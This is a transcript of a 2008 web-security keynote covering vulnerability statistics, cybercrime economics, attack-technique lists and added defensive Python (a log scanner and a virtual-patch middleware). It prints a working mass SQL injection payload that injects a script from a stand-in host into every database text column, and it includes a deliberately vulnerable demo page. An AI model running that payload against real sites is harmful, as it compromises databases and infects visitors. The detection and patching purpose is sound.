Hacks Happen (keynote) - Stanford Emerging Threats and Defenses Symposium (07/23/2008)

Post on 24-Jun-2015

DESCRIPTION

Conservative estimates put the total annual IT security spending in the US at $50 billion and e-crime losses at $100 billion. We’re losing two dollars for every dollar spent. Those numbers are said to be worse on a global scale. Newly passed laws, industry regulation, and press coverage have certainly raised the profile of the problem, but where have these actions really gotten us? Websites are riddled with easy-to-exploit vulnerabilities, millions of desktops are infected with botnet-connected malware, and cyber-attacks are more targeted, numerous, and financially motivated than ever! All the statistics we have seem to be moving in the wrong direction. And the more effort we invest, the harder it is to tell if the situation is getting better or worse. These days we have a lot more experts and less expertise. More products and less coverage. More best practices and less security. More news and less information. This type of environment is exactly why hacks happen every minute of every hour of every day. It’s time to take a second look at what we know, reconsider what we think we know, and possibly come to a whole new set of assumptions.

TRANSCRIPT

© 2008 WhiteHat Security, Inc.

Hacks Happen

Jeremiah Grossman, WhiteHat Security founder & CTO
blog: http://jeremiahgrossman.blogspot.com/
email: jeremiah@whitehatsec.com

0wN3d!!1

1998’s best practices:
- Don’t write your own crypto algorithms
- Don’t run web servers as root
- Use Secure Sockets Layer (SSL)
- Have proper file system permissions

Wait, how does this make a website secure?

What’s input validation?

http://www.w3.org/Security/Faq/

Probably Cross-Site Scripting

Will hack for T-Shirt :)

I made $14 an hour

Job Description: Hack Everything!

Official Title: “the hacker yahoo”

...and play foosball

...No articles...

...No white papers...

...No methodologies...

NOTHING!

...except for a hacker named rain.forest.puppy writing about an obscure attack called SQL Injection.

How I hacked PacketStorm: http://packetstormsecurity.nl/0002-exploits/rfp2k01.txt

Protect this website and the ~599 others

Find the vulnerabilities before the bad guys

Job security

“ There is no "secure development lifecycle" in the vast majority of universities' degree programs - that is, security is not "baked into" graduates of relevant programs (e.g., computer science) throughout their degree programs. And that is a problem, perhaps the problem plaguing the software industry.”

Mary Ann Davidson, Chief Security Officer at Oracle

The Supply Chain Problem: http://blogs.oracle.com/maryanndavidson/2008/04/08#a286

17 million programmers worldwide, writing 6,000 lines of code per year (each)

17 million programmers worldwide:
http://www.itjungle.com/tlb/tlb011607-story06.html
http://deepfreeze9.blogspot.com/2007/08/factoid-19-million-programmers-by-2010.html
http://blogs.zdnet.com/ITFacts/?p=12808

U.S. Department of Labor Bureau of Labor Statistics - Computer Programmers: http://www.bls.gov/oco/ocos110.htm

~6 KLOC per year per developer:
http://blogs.msdn.com/philipsu/archive/2006/06/14/631438.aspx
http://fixunix.com/linux/370267-attackers-hose-down-microsoft-s-jet-db-engine-5.html
http://blogs.msdn.com/eldar/archive/2006/07/07/647858.aspx

Source lines of code, for scale:
Windows 2000: 29 million
Red Hat Linux 7.1: 30 million
Windows XP: 40 million
Windows Vista: 50 million
Mac OS X 10.4: 86 million

17 million programmers × 6,000 lines each = 102 billion new lines of code pushed per year

Source lines of code: http://en.wikipedia.org/wiki/Source_lines_of_code

Conservative research says: 1 security defect for every 10,000 lines of code

1 vulnerability per 10 KLOC:
http://www.informationweek.com/story/showArticle.jhtml?articleID=205600229&cid=RSSfeed_IWK_All
http://www.pcworld.com/businesscenter/article/141226/open_source_security_bugs_uncovered.html

(potentially) new undiscovered vulnerabilities, at 1 per 10 KLOC of 102 billion new lines:
10,200,000 per year
850,000 per month
28,000 per day

In 2007 IBM X-Force reported 6,437 vulnerabilities.

Total vulnerabilities EVER reported in the National Vulnerability Database: ~32,000 (CVE publication rate: 16 vulnerabilities / day)

IBM Internet Security Systems X-Force 2007 Trend Statistics: http://www-935.ibm.com/services/us/iss/pdf/etr_xforce-2007-annual-report.pdf

National Vulnerability Database: http://nvd.nist.gov/

If only 1% of new undiscovered vulnerabilities are exploitable: 102,000 zero-days per year (1% of 10,200,000)

Location of the other ~95,000 zero-days (102,000 minus the 6,437 reported in 2007): unknown

172,000,000 websites

millions more added per month

June 2008 Web Server Survey: http://news.netcraft.com/archives/2008/06/22/june_2008_web_server_survey.html

809,000 websites use SSL, protecting passwords, credit card numbers, social security numbers, and our email (if we’re lucky).

Extended Validation SSL Certificates now 1 Year Old: http://news.netcraft.com/archives/2008/02/17/extended_validation_ssl_certificates_now_1_year_old.html

9 out of 10 websites have vulnerabilities allowing hackers unauthorized access

WhiteHat Security Website Security Statistics Report (March): https://whitehatsec.market2lead.com/go/whitehatsec/stats0308

“A 2007 report from NTA Monitor found that 90 percent of UK-based company websites harboured at least one weakness that could allow hackers to gain unauthorised access.” http://www.continuitycentral.com/feature0555.htm

70% of websites at immediate risk of being hacked! http://www.acunetix.com/news/security-audit-results.htm

http://www.heise-online.co.uk/news/Every-second-web-application-contains-between-one-and-ten-holes--/110515
http://www.symantec.com/business/theme.jsp?themeid=threatreport

hacked

If there’s just 1 vulnerability on 90% of the SSL websites (other reports say an average of 7): 728,100 total vulnerabilities (90% of 809,000)

WhiteHat Security Website Security Statistics Report (March): https://whitehatsec.market2lead.com/go/whitehatsec/stats0308

XSSed.com has reported:

20,843 total vulnerabilities

1,072 fixed (5%)

http://www.xssed.com/

“SSL is like using an armored truck to transport rolls of pennies between someone on a park bench and someone doing business from a cardboard box.” Eugene H. Spafford, Professor, Purdue University - 2002

“[Application security] is one of the most serious and often overlooked risks facing government and commercial organizations. The root cause of these risks is not flawed software, but software development processes that pay little or no attention to security.” Jeff Williams, OWASP Chair - 2003

“The reason is that bad software lies at the heart of all computer security problems, and more and more bad software is being produced. Traditional solutions simply treat the symptoms, not the problem, and usually do so in a reactive way.” Gary McGraw, CTO of Cigital - 2001

A new infected Web page is discovered every 5 seconds, 24 hours a day, 365 days a year.

Over 79% of websites hosting malicious code are legitimate (compromised by attackers).

Sophos: One Web page infected every five seconds: http://news.zdnet.com/2424-1009_22-198647.html

In 2006, 0.3% of all Internet queries returned at least one URL containing malicious content.
2007 - 1.3%
2008 - ?

How Unsecure Is The Web? http://blogs.forrester.com/srm/2008/03/how-unsecure-is.html

Kraken: 400,000 infected computers
Srizbi: 315,000 infected computers
Storm: 200,000 infected computers

2nd generation malware

Vint Cerf: one quarter of all computers part of a botnet: http://arstechnica.com/news.ars/post/20070125-8707.html

http://www.fbi.gov/cyberinvest/protect_online.htm

Mass SQL Injection
1. Google recon for weak websites (*.asp, *.php)
2. Generic SQL Injection populates databases with malicious JavaScript IFRAMEs.
3. Visitors arrive (U.N., DHS, etc.) and their browser auto-connects to a malware server, infecting their machine with trojans.
4. Botnets form, which then continue SQL injecting websites.

http://blogs.zdnet.com/security/?p=1150
http://ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines.html
http://blogs.zdnet.com/security/?p=1122
http://ddanchev.blogspot.com/2008/04/united-nations-serving-malware.html

DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name, b.name
  FROM sysobjects a, syscolumns b
  WHERE a.id = b.id AND a.xtype = 'u'        -- every user table
    AND (b.xtype = 99 OR b.xtype = 35        -- ntext, text
      OR b.xtype = 231 OR b.xtype = 167);    -- nvarchar, varchar
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
  -- append the script tag to every row of every text column found above
  EXEC('update [' + @T + '] set [' + @C + '] = rtrim(convert(varchar,[' + @C + ']))+''<script src=http://evilsite.com/1.js></script>''');
  FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

Skeleton key unlocks Microsoft SQL servers in latest Web attack: http://www.news.com/8301-10789_3-9938224-57.html
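
An added example (not code from the deck or from WhiteHat): a Python scanner that finds the payload above in web server access logs, covering both the percent-encoded form and the hex-wrapped CAST(0x... AS NVARCHAR(n)) form the in-the-wild campaigns used to slip past keyword filters. The log lines, client addresses and the evilsite.com hostname are constructed for the example, and the hex-CAST wrapper is an assumption about those campaigns rather than something shown on the slide.

```python
"""Mass-SQL-injection detector for web server access logs (added example).

Recognises the cursor-driven T-SQL payload (the one that appends <script src=...>
to every text column) in the request line, after percent-decoding and after
expanding a CAST(0x... AS [N]VARCHAR(n)) hex wrapper. Sample log is constructed.
"""
import re
from urllib.parse import quote, unquote

# The decoded payload from the deck, condensed to one line (whitespace only).
PAYLOAD = (
    "DECLARE @T varchar(255),@C varchar(255);"
    "DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b "
    "WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167);"
    "OPEN Table_Cursor;FETCH NEXT FROM Table_Cursor INTO @T,@C;"
    "WHILE(@@FETCH_STATUS=0) BEGIN EXEC('update ['+@T+'] set ['+@C+']="
    "rtrim(convert(varchar,['+@C+']))+''<script src=http://evilsite.com/1.js></script>''');"
    "FETCH NEXT FROM Table_Cursor INTO @T,@C;END;CLOSE Table_Cursor;DEALLOCATE Table_Cursor;"
)

# Every fragment must be present (case-insensitive) in the decoded query string.
SIGNATURE = ("DECLARE", "CURSOR", "SYSOBJECTS", "SYSCOLUMNS", "EXEC(", "<SCRIPT")

# CAST(0x4445... AS NVARCHAR(4000)) -> the string those bytes spell (assumed wrapper).
HEX_CAST = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR\s*(?:\(\s*\d+\s*\))?\s*\)", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"<script\s+src=['\"]?([^'\">\s]+)", re.IGNORECASE)
# Common Log Format: client ident user [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')


def decode_hex_casts(text: str) -> str:
    """Replace each CAST(0x.. AS [N]VARCHAR) with the string it evaluates to."""
    def expand(m: re.Match) -> str:
        try:
            raw = bytes.fromhex(m.group(1))
        except ValueError:          # odd-length garbage: leave it alone
            return m.group(0)
        # NVARCHAR payloads are UTF-16LE ("44 00 45 00 ..."); an ASCII payload read
        # as UTF-16LE turns into non-ASCII code points, so fall back to raw bytes.
        try:
            s = raw.decode("utf-16-le")
            if s.isascii():
                return s
        except UnicodeDecodeError:
            pass
        return raw.decode("latin-1")
    return HEX_CAST.sub(expand, text)


def normalize(query: str) -> str:
    """Percent-decode twice (double encoding is common) and expand hex CASTs."""
    return decode_hex_casts(unquote(unquote(query)))


def is_mass_sqli(target: str) -> bool:
    """True when the request target carries the cursor-based payload."""
    _path, _, query = target.partition("?")
    decoded = normalize(query).upper()
    return all(frag in decoded for frag in SIGNATURE)


def injected_script_sources(target: str) -> list:
    """The URLs the payload would append to every text column."""
    return SCRIPT_SRC.findall(normalize(target.partition("?")[2]))


def scan_log(lines) -> list:
    """Return (client, path, [script src...]) for each injecting request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        if is_mass_sqli(target):
            hits.append((client, target.partition("?")[0], injected_script_sources(target)))
    return hits


# Constructed sample log: the payload percent-encoded, then hidden inside a
# hex CAST (UTF-16LE, the NVARCHAR form), then a benign request.
_PLAIN = "/products.asp?id=123;" + quote(PAYLOAD) + "--"
_HEXED = ("/news.asp?id=7;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
          + PAYLOAD.encode("utf-16-le").hex().upper()
          + "%20AS%20NVARCHAR(4000));EXEC(@S);--")
SAMPLE_LOG = [
    f'203.0.113.5 - - [12/May/2008:03:14:07 +0000] "GET {_PLAIN} HTTP/1.1" 200 5123',
    f'198.51.100.9 - - [12/May/2008:03:14:09 +0000] "GET {_HEXED} HTTP/1.1" 200 5123',
    '192.0.2.44 - - [12/May/2008:03:15:01 +0000] "GET /products.asp?id=123 HTTP/1.1" 200 5123',
]

if __name__ == "__main__":
    for client, path, srcs in scan_log(SAMPLE_LOG):
        print(f"{client} injected {path}: would load {srcs}")
```

Run as a script it lists the two injecting clients, the attacked page and the script URL the payload appends to every text column. The same is_mass_sqli predicate works as a request filter in front of the database, and the extracted src is the string to search the affected columns for during cleanup; note that a 200 status in the log says nothing about whether the injection succeeded, only that the page rendered.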

China-based online “Password Recovery” services: you pay them to hack into “your” account.

1. 300 Yuan ($43) to break an overseas mailbox password, with 85% probability of success.
2. 200 Yuan ($29) to break a domestic mailbox password, with 90% probability of success.
3. 1000 Yuan ($143) to break a company’s mailbox password (no success rate given).

Also on the menu: passwords for 163, 126, QQ, Yahoo, Sohu, Sina, TOM, Hotmail, MSN… etc.

http://www.thedarkvisitor.com/2008/04/mailbox-passwords-for-sale-chinese-hacker-business-or-scam/
http://news.cnnb.com.cn/system/2008/04/14/005548493.shtml

Hire to Hack: http://www.hire2hack.net/

Variable project-based pricing, $150 (USD) minimum. They accept Western Union.

Insider: someone with a fiduciary role at a company, such as a corporate executive, investment banker or attorney.

Not a hacker

Hacker holds onto ill-gotten gains thanks to US courts: http://www.theregister.co.uk/2008/02/19/insider_trading_catch22

Accounts and card data:
PayPal or eBay Acct: $8
Credit cards w/ CCV & exp: $25
Bank Acct: $1,000
World-of-Warcraft level-70 Acct: $4

0-Days:
WMF Exploit: $4,000
RealPlayer 11: $10,000
OS X: $10,000 + a 15-inch MacBook Pro
Windows Vista: $50,000
Internet Explorer: $100,000
What Microsoft pays for 0-days... $0

http://www.bestsecuritytips.com/news+article.storyid+116.htm
http://securitywatch.eweek.com/browsers/russian_firm_demos_realplayer_zeroday_exploit.html
http://blogs.technet.com/security/archive/2008/04/10/rsa-2008-keynote-john-thompson.aspx
http://www.theregister.co.uk/2007/04/20/pwn-2-own_winner/
http://www.arnnet.com.au/index.php/id;741896054;pp;2;fp;4194304;fpid;1
http://www.letemps.ch/template/economie.asp?page=9&article=228747

Average window of exposure for well-known vulnerabilities (before vendors patch): 55 days

80% of exploits are available within 19 days of disclosure.

IBM Internet Security Systems X-Force 2007 Trend Statistics: http://www-935.ibm.com/services/us/iss/pdf/etr_xforce-2007-annual-report.pdf

[chart] Percentage likelihood that a website has a particular vulnerability, by class

WhiteHat Security Website Security Statistics Report (March): https://whitehatsec.market2lead.com/go/whitehatsec/stats0308

Security in the SDLC

Source: Software Security, by Gary McGraw

Studies indicate that 75% of security breaches are due to flaws in software.

90% of IT security spending is on perimeter security such as firewalls

Insanity - Doing the Same Thing Over and Over Again Expecting a Different Result: http://blogs.csoonline.com/insanity_doing_the_same_thing_over_and_over_again_expecting_a_different_result

Application security trend report for q4 2007: http://www.cenzic.com/pdfs/Cenzic_AppSecTrends_Q4-07.pdf

Facing up to the threat of cyber-crime: http://www.continuitycentral.com/feature0555.htm

VA + WAF (vulnerability assessment findings fed into a web application firewall as virtual patches)

Website Defacements
493,000 in 2005
752,000 in 2006
480,000 in 2007

Roughly one defacement every minute (480,000 a year works out to about one every 66 seconds)

http://www.zone-h.org/content/view/14928/30/

http://www.infoworld.com/article/07/11/26/Another-inconvenient-truth-Al-Gores-Web-site-hacked_1.html
http://news.netcraft.com/archives/2008/04/21/hacker_redirects_barack_obamas_site_to_hillaryclintoncom.html
http://www.scmagazineus.com/XSS-flaw-on-Obama-page-sends-visitors-to-Clinton-site/article/109309/

[chart] Average time to fix, in days (scale: 180, 270, 365)

WhiteHat Security Website Security Statistics Report (March): https://whitehatsec.market2lead.com/go/whitehatsec/stats0308

Options after a vulnerability is found, but before we’re able to fix it:
1. Take the website down
2. Revert to an older version of the website/code (if secure)
3. Stay up while exposed
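
As an added example of the VA + WAF route to “stay up while exposed” (not code from the deck or from any WAF product): a Python WSGI middleware that turns a single scanner finding into a virtual patch. The page names, parameters and allowed-value rules are assumptions made for the example. The rule is positive validation of what the page legitimately accepts, and it parses the query string the way the backend does, because a filter that tokenises differently from the application can be walked around.

```python
"""Virtual patch as WSGI middleware (added example, assumptions throughout).

A vulnerability assessment says /products.asp is SQL-injectable through `id`.
Until the code is fixed, reject any request whose `id` is not a small integer.
"""
import re
from urllib.parse import unquote_plus

# One rule set per open finding: path -> {parameter: regex the value must match}.
# Positive validation beats a blacklist of attack strings: the payload changes
# from campaign to campaign, a product id is always a short run of digits.
VIRTUAL_PATCHES = {
    "/products.asp": {"id": re.compile(r"^\d{1,9}$")},
    "/search.asp": {"q": re.compile(r"^[\w .,-]{0,64}$")},
}


def parse_query(query_string: str) -> list:
    """Split on '&' only and percent-decode, as the backend's parser does.

    Splitting on ';' as well (older urllib.parse.parse_qs did) would turn
    'id=42;DECLARE ...' into id=42 plus a harmless-looking second key and
    let the injection straight through the patch.
    """
    pairs = []
    for part in query_string.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def check_request(path: str, query_string: str, patches=VIRTUAL_PATCHES):
    """Return None if the request passes, else a reason string for the block."""
    rules = patches.get(path)
    if not rules:
        return None                      # no open finding on this page
    for name, value in parse_query(query_string):
        allowed = rules.get(name)
        if allowed is not None and not allowed.match(value):
            return f"{path}: parameter {name!r} failed virtual patch"
    return None


def virtual_patch(app, patches=VIRTUAL_PATCHES):
    """Wrap a WSGI app; answer 403 for requests the rules reject."""
    def guarded(environ, start_response):
        reason = check_request(environ.get("PATH_INFO", ""),
                               environ.get("QUERY_STRING", ""), patches)
        if reason:
            body = b"blocked by virtual patch\n"
            start_response("403 Forbidden", [("Content-Type", "text/plain"),
                                             ("Content-Length", str(len(body)))])
            return [body]
        return app(environ, start_response)
    return guarded


def vulnerable_page(environ, start_response):
    """Stand-in for the page awaiting its code fix: builds SQL by concatenation."""
    params = dict(parse_query(environ.get("QUERY_STRING", "")))
    sql = "SELECT name FROM products WHERE id = " + params.get("id", "")
    body = sql.encode()                  # echoed back so the effect is visible
    start_response("200 OK", [("Content-Type", "text/plain"),
                              ("Content-Length", str(len(body)))])
    return [body]


def run(app, path: str, query: str):
    """Drive a WSGI app in-process; return (status, body) for a GET."""
    seen = {}

    def start_response(status, headers, exc_info=None):
        seen["status"] = status
    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path, "QUERY_STRING": query}
    body = b"".join(app(environ, start_response))
    return seen["status"], body.decode()


if __name__ == "__main__":
    guarded = virtual_patch(vulnerable_page)
    print(run(guarded, "/products.asp", "id=42"))
    print(run(guarded, "/products.asp", "id=42;DECLARE%20@T%20varchar(255)--"))
```

The rule blocks the injection without knowing anything about the payload, which is what makes it a stop-gap for the ones you have not seen yet; it is still only a stop-gap, because any input path the scanner did not find (POST bodies, cookies, headers) is unpatched until the concatenated query itself is replaced.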

Too much code, too few application security specialists: http://www.regdeveloper.co.uk/2008/05/28/agile_security/

IT Security: lack of control

Responsible for the security of the Website(s)
Justifies resource allocation to the business owners
Promotes security inside the SDLC via policy and education

But:
Network security solutions don’t work for Web applications
Can’t fix the vulnerabilities without developer involvement
Developers don’t work for them

Welcome to Web 2.0: Ajax, Silverlight, Flash/Flex, Ruby on Rails, Dojo, C#, JavaScript, JSON, OpenID, Widgets, SaaS, HTML5, Python, J2EE, MooTools, RSS, Social Networks, OpenSocial

Bill rate for a source code reviewer: $150 (US) per hour
Source code review for the average small to mid-sized website: $25,000 (US)

To cover 10% of the SSL websites (~80,000):
Total man hours: 13,360,000
Source code reviewers: 6,680
Annual economic burden: $2,000,000,000 (US)

If all new code is inspected to find 1 undiscovered vulnerability every 60 seconds... we’d never find them all (10,200,000 a year at one a minute is about 19 years of work per year of code).

If every 10 seconds... it would take about 3 years to find all the new vulnerabilities for just this year.

And then we still have to fix the vulnerabilities

Hackers just need to exploit one to get in.

Starting in 2006, the DHS spent $300,000 (US) on a project to find and fix security defects in 180 Open Source projects.

Found 1 security defect per 1,000 lines (not 10,000)
7,826 defects fixed
$38 per vulnerability

By 2012 over 90% of enterprises will use open source

Open Source Code Contains Security Holes:
http://www.informationweek.com/news/security/showArticle.jhtml?articleID=205600229&_requestid=87046
http://www.pcworld.com/businesscenter/article/141226/open_source_security_bugs_uncovered.html

Gartner: Open source will quietly take over: http://news.zdnet.co.uk/software/0,1000000121,39379900,00.htm

Conservative estimates put the total annual IT security spend in the US at $50 billion and e-crime losses at $100 billion.

We’re losing two dollars for every dollar spent.

Facing up to the threat of cyber-crime: http://www.continuitycentral.com/feature0555.htm

Calculating the Costs of Cyber Crime: http://blog.washingtonpost.com/securityfix/2007/09/counting_the_cost_of_cyber_cri.html

Change does not happen overnight

From: Bill Gates
Sent: Tuesday, January 15, 2002 5:22 PM
To: Microsoft and Subsidiaries: All FTE
Subject: Trustworthy computing

Secure Code ROI: Reduce Costs, Increased Revenue, Loss Avoidance, Policy Compliance

(2006 and 2007) New Web Hacking Techniques

The Attack of the TINY URLs
Backdooring MP3 Files
Backdooring QuickTime Movies
CSS history hacking with evil marketing
I know where you've been
Stealing Search Engine Queries with JavaScript
Hacking RSS Feeds
MX Injection : Capturing and Exploiting Hidden Mail Servers
Blind web server fingerprinting
JavaScript Port Scanning
CSRF with MS Word
Backdooring PDF Files
Exponential XSS Attacks
Malformed URL in Image Tag Fingerprints Internet Explorer
JavaScript Portscanning and bypassing HTTP Auth
Bruteforcing HTTP Auth in Firefox with JavaScript
Bypassing Mozilla Port Blocking
How to defeat digg.com
A story that diggs itself
Expect Header Injection Via Flash
Forging HTTP request headers with Flash
Cross Domain Leakage With Image Size
Enumerating Through User Accounts
Widespread XSS for Google Search Appliance
Detecting States of Authentication With Protected Images
XSS Fragmentation Attacks
Poking new holes with Flash Crossdomain Policy Files
Detecting Privoxy Users and Circumventing It
Using CSS to De-Anonymize
Response Splitting Filter Evasion
Adultspace XSS Worm
CSS History Stealing Acts As Cookie
Detecting FireFox Extensions
Stealing User Information Via Automatic Form Filling
Circumventing DNS Pinning for XSS
Netflix.com XSRF vuln
Browser Port Scanning without JavaScript
Widespread XSS for Google Search Appliance
Bypassing Filters With Encoding
Variable Width Encoding
Network Scanning with HTTP without JavaScript
AT&T Hack Highlights Web Site Vulnerabilities
How to get linked from Slashdot
F5 and Acunetix XSS disclosure
Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
Google plugs phishing hole
Nikon magazine hit with security breach
Governator Hack
Metaverse breached: Second Life customer database hacked
HostGator: cPanel Security Hole Exploited in Mass Hack
I know what you've got (Firefox Extensions)
ABC News (AU) XSS linking the reporter to Al Qaeda
Account Hijackings Force LiveJournal Changes
Xanga Hit By Script Worm
Advanced Web Attack Techniques using GMail
PayPal Security Flaw allows Identity Theft
Internet Explorer 7 "mhtml:" Redirection Information Disclosure
Bypassing of web filters by using ASCII
Google Indexes XSS
XML Intranet Port Scanning
IMAP Vulnerable to XSS
Selecting Encoding Methods For XSS Filter Evasion

Anonymizing RFI Attacks Through Google
Google Hacks On Your Behalf
Google Dorks Strike Again
Cross-Site Printing (Printer Spamming)
Stealing Pictures with Picasa
HScan Redux
ISO-8895-1 Vulnerable in Firefox to Null Injection
MITM attack to overwrite addons in Firefox
Microsoft ASP.NET Request Validation Bypass Vulnerability (POC)
Non-Alpha-Non-Digit 3
Steal History without JavaScript
Pure Java™, Pure Evil™ Popups
Google Adsense CSRF hole
There’s an OAK TREE in my blog!?!?!
BK for Mayor of Oak Tree View
Google Docs puts Google Users at Risk
All Your Google Docs are Belong To US…
Java Applets and DNS Rebinding
Scanning internal Lan with PHP remote file opening.
Firefox File Handling Woes
Firefoxurl URI Handler Flaw
Bugs in the Browser: Firefox’s DATA URL Scheme Vulnerability
Multiviews Apache, Accept Requests and free listing
Optimizing the number of requests in blind SQL injection
Bursting Performances in Blind SQL Injection - Take 2 (Bandwidth)
Port Scan without JavaScript
Favorites Gone Wild
Login Detection without JavaScript
Anti-DNS Pinning ( DNS Rebinding ) : Online Demonstration
Username Enumeration Timing Attacks (Sensepost)
Google GMail E-mail Hijack Technique
Recursive Request DoS
Exaggerating Timing Attack Results Via GET Flooding
Initiating Probes Against Servers Via Other Servers
Effects of DNS Rebinding On IE’s Trust Zones
Paper on Hacking Intranets Using Websites (Not Web Browsers)
More Port Scanning - This Time in Flash
HTTP Response Splitting and Data: URI scheme in Firefox
Res:// Protocol Local File Enumeration
Res Timing Attack
IE6.0 Protocol Guessing
IE 7 and Firefox Browsers Digest Authentication Request Splitting
Hacking Intranets Via Brute Force
Hiding JS in Valid Images
Internet Archiver Port Scanner
Noisy Decloaking Methods
Code Execution Through Filenames in Uploads
Cross Domain Basic Auth Phishing Tactics
Additional Image Bypass on Windows
Detecting users via Authenticated Redirects
Passing Malicious PHP Through getimagesize()
Turn Any Page Into a Greasemonkey Popup
Enumerate Windows Users In JS
Anti-DNS Pinning ( DNS Rebinding ) + Socket in FLASH
Iframe HTTP Ping
Read Firefox Settings (PoC)
Stealing Mouse Clicks for Banner Fraud
(Non-Persistent) Untraceable XSS Attacks
Inter Protocol Exploitation
Detecting Default Browser in IE
Bypass port blocking in Firefox, Opera and Konqueror.
LocalRodeo Detection
Image Names Gone Bad
IE Sends Local Addresses in Referer Header
PDF XSS Can Compromise Your Machine
Universal XSS in Adobe’s Acrobat Reader Plugin
Firefox Popup Blocker Allows Reading Arbitrary Local Files
IE7.0 Detector
overwriting cookies on other people’s domains in Firefox.
Embeding SVG That Contains XSS Using Base64 Encoding in Firefox
Firefox Header Redirection JavaScript Execution
More URI Stuff… (IE’s Resouce URI)
Hacking without 0days: Drive-by Java
Google Urchin password theft madness
Username Enumeration Vulnerabilities
Client-side SQL Injection Attacks
Content-Disposition Hacking
Flash Cookie Object Tracking
Java JAR Attacks and Features
Severe XSS in Google and Others due to the JAR protocol issues
Web Mayhem: Firefox’s JAR: Protocol issues (bugzilla)
0DAY: QuickTime pwns Firefox
Exploiting Second Life
Injecting the script tag into XML
Cross-Browser Proxy Unmasking
Spoofing Firefox protected objects

Top Ten Web Hacks of 2007 (Official): http://jeremiahgrossman.blogspot.com/2008/01/top-ten-web-hacks-of-2007-official.html

Top 10 Web Hacks of 2006: http://jeremiahgrossman.blogspot.com/2006/12/top-10-web-hacks-of-2006.html

Website - Founded
Amazon - 1994
Yahoo - 1995
eBay - 1995
Bank of America - 1997
Google - 1998
MySpace - 2003
YouTube - 2005

Vulnerability - Attack (year it became well-known)
Buffer Overflow - 1996
Command Injection - 1996
SQL Injection - 2004
XSS - 2005
Predictable Resource Location - ?
HTTP Response Splitting - 2005 / ?
CSRF - ?

More major websites were launched before significant classes of attack were “well-known”

The bad guys do

"Personally, I'd love to see everyone go through an OWASP-based source-code review, but certainly, that's not going to happen."

Bob Russo, PCI Standards Council General Manager

Next version of PCI DSS due in September: http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1309120,00.html?track=sy160&asrc=RSS_RSS-10_160

Get Rich or Die Trying: "Making Money on The Web, The Black Hat Way"
by Jeremiah Grossman, Arian Evans

https://www.blackhat.com/html/bh-usa-08/bh-usa-08-schedule.html

don’t let them scare you

The Good News

http://www.webappsec.org/

Web Security Mailing List (2,600+ subscribers)
Threat Classification (v2 in progress)
Statistics (additional vendors coming on board)
Web Application Firewall Evaluation Criteria (v2 in progress)
Web Hacking Incident Database
Distributed Open Proxy Honeypot

http://www.owasp.org/

PCI-DSS 6.6

Debian OpenSSL predictable-key bug (May 2008):
http://metasploit.com/users/hdm/tools/debian-openssl/
http://www.theregister.co.uk/2008/05/21/massive_debian_openssl_hangover/
http://blogs.zdnet.com/security/?p=1102

For more information visit: www.whitehatsec.com/

Jeremiah Grossman, founder and CTO
blog: http://jeremiahgrossman.blogspot.com/
email: jeremiah@whitehatsec.com

Thank You
